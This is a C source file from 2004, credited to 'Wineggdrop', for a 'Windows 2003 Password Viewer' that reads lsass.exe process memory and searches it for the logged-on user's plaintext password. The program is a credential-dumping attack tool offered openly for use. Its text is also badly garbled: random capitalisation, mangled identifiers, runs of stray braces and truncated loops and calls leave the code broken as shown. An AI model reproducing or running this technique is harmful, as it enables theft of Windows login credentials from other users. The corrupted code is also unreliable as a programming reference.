// ******************************************************** ***************************************** // Version: v1.0 // CODER: Wineggdrop // Date Release: 12 / 15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box, The Method // Used Is Pretty unwise, But This May Be The Only Way To Review The // Logon User's Password On Windows 2003. // Test PlatForm : Windows 2003 // Compiled ON: VC 6.0 // ********************************************** ******************************** #include
#define baseaddress 0x002b5000 // The base memory address to search; the password may be located before the address or far more from this address, Which Causes the result unreliable
Char password [MAX_PATH] = {0}; // Store The Found Password
// Function prototype declaration // ------------------------------------------- -------------------------------------------------- --------- Bool Findpassword (DWORD PID); int search (char * buffer, const uint nsize); dWord getlsasspid (); BOOL IS2003 (); // ---------- -------------------------------------------------- ------------------------------------------ // end of fucntion prototype declaration
INT main () {dWord PID = 0; Printf ("Windows 2003 Password Viewer V1.0 By WineggDrop / N / N");
IF (! IS2003 ()) // Check Out if The Box IS 2003 {Printf ("The Program CAN't Only Run On Windows 2003 Platform / N"); Return -1;}
PID = getlsassspid (); // get the lsass.exe pid
IF (PID == 0) // Fail to Get Pid if Returning Zerom {Return -1;}
Findpassword (PID); // Find the password from lsass.exe memory return 0;} // end main ()
/ / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: Search The Memory & Try to Get The Password / / RETURN TYPE: INT // Parameters: // in: Char * Buffer -> The Memory Buffer To search // Out: const uint nsize -> The size of the memory buffer // Note: The Program Tries To Locate T Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location, But It's Not Always True That // We Will Find The Magic String, Or Even We Find It, The Password May Be Located // At Some Other Place.WE Only Look for luck // ----------------------------------------- ----------------------------------------- Int search (char * buffer, Const uint nsize) {uint offset = 0; uint i = 0; uint j = 0; uint count = 0; if (buffer == null) {return -1;} for (i = 0; i IF (& Buffer [i offset], "procedure", strlen ("procedure")) == 0) {OFFSET = Strlen ("procedure") 1; IF (Strnicmp (& Buffer [i offset], "Call", Strlen ("Call") == 0) {i = Offset; Break;}}}}}}}}}}}}}}}}} {zeromeMEMEMORY (Password, Sizeof (Password)); for (; i / / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: to get the lsass.exe pid // return TYPE: DWORD // Parameters: None // ---------------------------------------- ------------------------------------------ DWORD GETLSASSPID () {Handle hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) {printf ( "Fail To Create Snap Shot / n"); return 0;} PE32.dwsize = sizeof (ProcesSsentry32); IF (! ProcessSnap, & PE32) {CloseHandle (HProcessSnap); // Must Clean Up The Snapshot Object! Return 0;} DO {IF (strcmpi (pe32.szexefile, "lsass.exe") == 0) {pid = pe32.th32processid; break;}} while (Process32Next (HProcessSnap, & PE32)); CloseHandle (HProcessSnap); Return PID;} // end getlsasspid () / / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: to find the password // Return Type: Boolean // Parameters: // in: DWORD PID -> The lsass.exe's pid // ------------------------------- -------------------------------------------------- --- Bool FindPassword (DWORD PID) {Handle HProcess = NULL; Char Buffer [5 * 1024] = {0}; DWORD BYTEGET = 0; int found = -1; HProcess = OpenProcess (Process_VM_READ, FALSE, PID); // Open process if (hprocess == null) {Printf ("Fail to open process / n"); return false;} IF (! ReadProcessMemory (HProcess, (Pvoid) Baseaddress, Buffer, 5 * 1024, & Byteget) // read the memory from lsass.exe {printf ("Fail to Read Memory / N"); CloseHandle (HProcess); Return False CloseHandle (HProcess); Found = Search (Buffer, Byteget); // Search the password if (Found> = 0) // We May Find the password {ix (strlen (password> 0) // Yes, WE Find The Password Even We don't know et {printf ("Found Password AT # 0x% x -> /"% s / "/ n", found baseaddress, password;}} else { Printf ("Fail to Find The Password / N");} Return True;} // end Findpassword / / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: Check if the box is windows 2003 // Return TYPE: Boolean // Parameters: none // ---------------------------------------- ------------------------------------------ BOOL IS2003 () {osversioninfoex Osvi; Bool B0SVersionInfoEx; ZeromeMory (osversioninfoex); Osvi.dwosveionInfosize = Sizeof (OsversionInfoEx); if {osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);} ((b0sVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) & osvi))!) return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);} // End Is2003 ( ) // end of file
